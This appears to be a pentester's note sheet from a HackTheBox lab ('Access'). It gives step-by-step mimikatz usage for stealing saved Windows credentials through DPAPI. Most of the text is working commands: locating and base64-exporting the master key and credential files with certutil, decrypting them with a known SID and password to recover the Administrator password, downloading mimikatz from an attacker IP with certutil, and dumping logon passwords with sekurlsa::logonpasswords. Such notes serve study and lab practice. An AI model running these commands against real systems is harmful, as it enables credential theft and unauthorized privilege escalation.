mimikatz crack Win hash
- Use mimikatz to crack Windows hash password
- Man tutorial: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials#dpapi-all-the-things
- Ref: https://github.com/gentilkiwi/mimikatz
- Wiki: https://github.com/gentilkiwi/mimikatz/wiki
- Download binary at: https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200308-1
- Tutorial: https://resources.infosecinstitute.com/mimikatz-walkthrough/#gref
- Mimikartz Quick Usage: https://github.com/gentilkiwi/mimikatz#quick-usage
- Ref: https://hipotermia.pw/htb/access
Get master key
C:\>cd %appdata%\Microsoft\ProtectC:\Users\security\AppData\Roaming\Microsoft\Protect>dir /aC:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>dir /a- Encode to base64 to easy copy:
C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 C:\temp\caca - Read base64 to easy copy:
C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001>type C:\temp\caca
Get credentials
- Credentials stored in
cd %appdata%\Microsoft\Credentials - Encode to base64 to easy copy
C:\Users\security\AppData\Roaming\Microsoft\Credentials>certutil -encode 51AB168BE4BDB3A603DADE4F8CA81290 C:\temp\pipi - Read base64 to easy copy:
C:\Users\security\AppData\Roaming\Microsoft\Credentials>type C:\temp\pipi
Basics
- Basics: https://github.com/gentilkiwi/mimikatz/wiki#basics
- Unzip the binary at https://github.com/lethanhtung01011980/Notes/blob/master/mimikatz_trunk.zip
- Click on x64/mimikatz.exe
- Instructions can be in the form:
modulename::commandname arguments - Modules: https://github.com/gentilkiwi/mimikatz/wiki#modules
- Run mimikatz in cmd:
C:\security\mimikatz\x64>mimikatz log version "crypto::certificates /systemstore:local_machine" exit
Decrypt the masterkey indicating the known user's SID and password
mimikatz # dpapi::masterkey /in:C:\Users\User\Documents\0792c32e-48a5-4fe3-8b43-d93d64590580 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
If everything works as expected, mimikatz should place the decrypted masterkey in cache.
mimikatz # dpapi::cache
Now we can read the credentials file and extract the Administrator's password.
dpapi::cred /in:D:\OSCP\HTB\101.Access\51AB168BE4BDB3A603DADE4F8CA81290- Master password is at
CredentialBlobparameter
- Ref: https://www.varonis.com/blog/what-is-mimikatz/
- Download mimikatz:
certutil.exe -urlcache -split -f http://10.10.14.14/mimikatz.exe mimikatz.exe - Get saved password (MUST have SYSTEM):
mimikatz # sekurlsa::logonpasswords